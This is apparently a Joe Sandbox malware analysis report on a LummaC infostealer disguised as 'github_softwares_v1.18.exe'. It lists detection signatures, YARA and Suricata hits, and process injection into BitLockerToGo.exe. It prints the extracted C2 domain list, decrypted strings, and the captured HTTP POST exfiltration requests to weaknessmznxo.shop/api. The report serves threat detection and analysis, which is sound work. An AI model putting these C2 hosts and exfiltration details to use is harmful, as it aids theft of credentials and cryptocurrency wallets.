Edit tour

Windows Analysis Report
github_softwares_v1.18.exe

Overview

General Information

Sample name:	github_softwares_v1.18.exe
Analysis ID:	1483201
MD5:	444cf08b351822e4bec5c4c1b9324942
SHA1:	d5607171f7aa06682efed7ced3ddaff08e2b384b
SHA256:	17aad4db38649728ef0e666755351794d4de41d82a36608226d8656ea54233cb
Tags:	exe
Infos:

Detection

LummaC, Go Injector, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected Go Injector

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

github_softwares_v1.18.exe (PID: 6632 cmdline: "C:\Users\user\Desktop\github_softwares_v1.18.exe" MD5: 444CF08B351822E4BEC5C4C1B9324942)

BitLockerToGo.exe (PID: 7056 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["bravedreacisopm.shop", "shellfyyousdjz.shop", "broccoltisop.shop", "grassytaisol.shop", "stimultaionsppzv.shop", "parntorpkxzlp.shop", "effectivedoxzj.shop", "horizonvxjis.shop", "weaknessmznxo.shop"], "Build id": "LPnhqo--@kolnausgb"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
github_softwares_v1.18.exe	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1708564024.000000C0006DC000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1663970758.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000000.00000002.1711084287.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: github_softwares_v1.18.exe PID: 6632	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 7056	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 7056	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 7056	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 5 entries

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.159.243

Timestamp:	2024-07-26T20:34:17.067725+0200
SID:	2054653
Source Port:	49738
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.159.243

Timestamp:	2024-07-26T20:34:04.320473+0200
SID:	2054653
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.127.169.103 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T20:34:42.629750+0200
SID:	2022930
Source Port:	443
Destination Port:	61397
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 172.67.159.243

Timestamp:	2024-07-26T20:34:06.971675+0200
SID:	2048094
Source Port:	49733
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 172.67.159.243

Timestamp:	2024-07-26T20:34:08.122528+0200
SID:	2048094
Source Port:	49734
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.127.169.103 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T20:34:41.323239+0200
SID:	2022930
Source Port:	443
Destination Port:	61396
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T20:34:19.147395+0200
SID:	2022930
Source Port:	443
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 172.67.159.243

Timestamp:	2024-07-26T20:34:05.636459+0200
SID:	2054653
Source Port:	49732
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: stimultaionsppzv.shop	Avira URL Cloud: Label: malware
Source: bravedreacisopm.shop	Avira URL Cloud: Label: phishing
Source: https://weaknessmznxo.shop/api	Avira URL Cloud: Label: malware
Source: https://weaknessmznxo.shop:443/api	Avira URL Cloud: Label: malware
Source: effectivedoxzj.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.3.github_softwares_v1.18.exe.14a79900000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["bravedreacisopm.shop", "shellfyyousdjz.shop", "broccoltisop.shop", "grassytaisol.shop", "stimultaionsppzv.shop", "parntorpkxzlp.shop", "effectivedoxzj.shop", "horizonvxjis.shop", "weaknessmznxo.shop"], "Build id": "LPnhqo--@kolnausgb"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.3% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: bravedreacisopm.shop
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shellfyyousdjz.shop
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: broccoltisop.shop
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: grassytaisol.shop
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stimultaionsppzv.shop
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: parntorpkxzlp.shop
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: effectivedoxzj.shop
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: horizonvxjis.shop
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: weaknessmznxo.shop
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LPnhqo--@kolnausgb

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_02A16E50 CryptUnprotectData,

1_2_02A16E50

Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: github_softwares_v1.18.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000580000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708247125.000000C000400000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701551736.0000014A798F0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701601425.0000014A798B0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C0006A1000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000580000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708247125.000000C000400000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701551736.0000014A798F0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701601425.0000014A798B0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C0006A1000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [eax], bl	1_2_02A0F290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	1_2_02A3C2D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	1_2_02A3A088
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_02A3C020
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esi+10h], 00000000h	1_2_02A12846
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	1_2_02A12846
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	1_2_02A27970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+00000094h]	1_2_02A27970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_02A27970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], 0000002Bh	1_2_02A27970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], dl	1_2_02A27970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+3Ch]	1_2_02A27970
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esi+08h], ebx	1_2_02A29EF2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+6Ch]	1_2_02A29EF2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_02A29EF2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+20h]	1_2_02A04E70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h	1_2_02A16E50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	1_2_02A09FA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 077DEFCDh	1_2_02A3C7E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_02A37F70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+60h]	1_2_02A17CBB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	1_2_02A21D60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000880h]	1_2_02A21AAF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 11081610h	1_2_02A25AEA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 11081610h	1_2_02A25A01
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [esi+eax], 0000h	1_2_02A19212
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	1_2_02A18A72
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], B33E16A3h	1_2_02A15BA8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp dword ptr [02A42DE4h]	1_2_02A15BA8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_02A26BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 11081610h	1_2_02A25B83
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp dword ptr [02A44B7Ch]	1_2_02A25B83
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, ecx	1_2_02A1F321
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, word ptr [edi+ecx*4]	1_2_02A08330
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	1_2_02A3B300
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp]	1_2_02A09890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edx], bl	1_2_02A09890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	1_2_02A3B090
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx ecx, byte ptr [esi+eax]	1_2_02A0E0E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	1_2_02A120F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	1_2_02A2582B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	1_2_02A1E80E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	1_2_02A229FA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	1_2_02A3B1D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 3BEBD150h	1_2_02A3C1D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	1_2_02A3B920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_02A23909
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	1_2_02A27140
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	1_2_02A3AE80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, ebx	1_2_02A38EE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	1_2_02A03620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	1_2_02A3B630
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h	1_2_02A1DFB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_02A15799
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	1_2_02A14F7A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	1_2_02A3C4B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_02A2143B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx]	1_2_02A03450
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	1_2_02A1BD90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	1_2_02A36590
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+18h]	1_2_02A0FDE3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [esi], cx	1_2_02A0FDE3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+60h]	1_2_02A185D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then dec edi	1_2_02A3CDD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [edx]	1_2_02A3AD00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	1_2_02A3AD00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then inc ebx	1_2_02A16550

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: bravedreacisopm.shop
Source: Malware configuration extractor	URLs: shellfyyousdjz.shop
Source: Malware configuration extractor	URLs: broccoltisop.shop
Source: Malware configuration extractor	URLs: grassytaisol.shop
Source: Malware configuration extractor	URLs: stimultaionsppzv.shop
Source: Malware configuration extractor	URLs: parntorpkxzlp.shop
Source: Malware configuration extractor	URLs: effectivedoxzj.shop
Source: Malware configuration extractor	URLs: horizonvxjis.shop
Source: Malware configuration extractor	URLs: weaknessmznxo.shop

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: weaknessmznxo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: weaknessmznxo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: weaknessmznxo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: weaknessmznxo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: weaknessmznxo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1279Host: weaknessmznxo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550577Host: weaknessmznxo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: weaknessmznxo.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: weaknessmznxo.shop
Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: weaknessmznxo.shop

Source: github_softwares_v1.18.exe	String found in binary or memory: http://.css
Source: github_softwares_v1.18.exe	String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: github_softwares_v1.18.exe	String found in binary or memory: http://html4/loose.dtd
Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
